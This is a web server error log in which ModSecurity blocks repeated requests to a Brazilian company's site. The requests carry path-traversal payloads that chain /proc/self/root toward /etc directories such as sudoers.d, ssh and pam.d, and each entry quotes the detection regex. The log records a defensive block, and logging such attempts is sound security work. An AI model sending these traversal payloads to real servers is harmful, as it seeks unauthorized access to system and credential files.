https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:21:10.790335 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:55620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnpv9ocpUE4ed4uDzS5wAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:12.839126 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:54022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnqAlT9VtDQc7bgUyMeQAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:16.432282 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:36794] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnrBXjF1vJNtV6CWre9AAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:21.952018 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.243.203:36810] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnsXbQATo66fKoS7wusgAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:26.581414 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:43424] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfntnbQATo66fKoS7wuvAAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:21:27.865081 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.241.46:49030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnt3bQATo66fKoS7wuvgAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:27.891328 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.243.203:43434] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnt_9ocpUE4ed4uDzS6gAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:21:29.200984 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.241.46:33392] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnuXbQATo66fKoS7wuvwAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:32.474626 2026] [:error] [pid 10709:tid 140411666392832] [client 74.7.243.203:43442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnvBXjF1vJNtV6CWre-QAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:35.915883 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:60332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnv5qj1wV0Si-OkefNmwAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:37.182702 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:60348] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnwRXjF1vJNtV6CWre-gAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:21:38.549596 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:60360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnwo6lpbStxTqkSktRuQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:42.203765 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:60366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnxglT9VtDQc7bgUyMfAAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:45.215501 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:33404] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnyf9ocpUE4ed4uDzS-gAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:46.515120 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:44102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnyo6lpbStxTqkSktRugAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:49.060695 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.243.203:37702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnzXbQATo66fKoS7wuygAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:50.223454 2026] [:error] [pid 10709:tid 140411641214720] [client 74.7.241.46:38594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfnzhXjF1vJNtV6CWre_gAAAcw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:54.666738 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.243.203:53696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn0njZBu2q05ozVU86EAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:57.018178 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.243.203:53708] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn1bysWC90G-1nBrAqZwAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:21:57.924950 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.241.46:38600] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn1QlT9VtDQc7bgUyMgwAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:21:59.232229 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:45296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn146lpbStxTqkSktRvAAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:03.905453 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:53716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn27ysWC90G-1nBrAqbQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:22:05.153073 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:54008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfn3bysWC90G-1nBrAqcAAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
